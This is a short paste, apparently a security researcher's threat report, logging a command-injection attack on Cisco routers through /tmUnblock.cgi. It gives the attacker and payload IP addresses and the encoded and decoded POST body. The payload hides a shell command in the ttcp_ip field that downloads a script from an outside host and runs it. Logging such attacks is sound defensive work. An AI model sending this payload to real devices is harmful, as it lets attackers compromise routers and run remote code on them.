Neonprimetime

Cisco Router OS Command Injection

Nov 17th, 2015
153
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.09 KB | None | 0 0
  1. Cisco Router OS Command Injection
  2. ******
  3. Source IP: 70.68.2.142
  4. Payload IP: 176.103.48.34
  5. ****
  6. POST /tmUnblock.cgi HTTP/1.1
  7. %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%20%77%67%65%74%20%2d%4f%20%73%63%61%43%2e%73%68%20%68%74%74%70%3a%2f%2f%31%37%36%2e%31%30%33%2e%34%38%2e%33%34%2f%74%74%70%2f%74%74%70%32%2e%73%68%3b%20%63%68%6d%6f%64%20%2b%78%20%73%63%61%43%2e%73%68%3b%20%2e%2f%73%63%61%43%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
  8.  
  9. ****
  10. URL Decoded
  11.  
  12. submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp; wget -O scaC.sh http://176.103.48.34/ttp/ttp2.sh; chmod +x scaC.sh; ./scaC.sh`&StartEPI=1
  13. ****
  14.  
  15. Reported by neonprimetime security
  16. Blog: http://neonprimetime.blogspot.com
  17. Twitter: https://twitter.com/neonprimetime @neonprimetime
  18. VirusTotal: https://www.virustotal.com/en/user/neonprimetime/
  19. Reddit: https://www.reddit.com/user/neonprimetime
Add Comment
Please, Sign In to add comment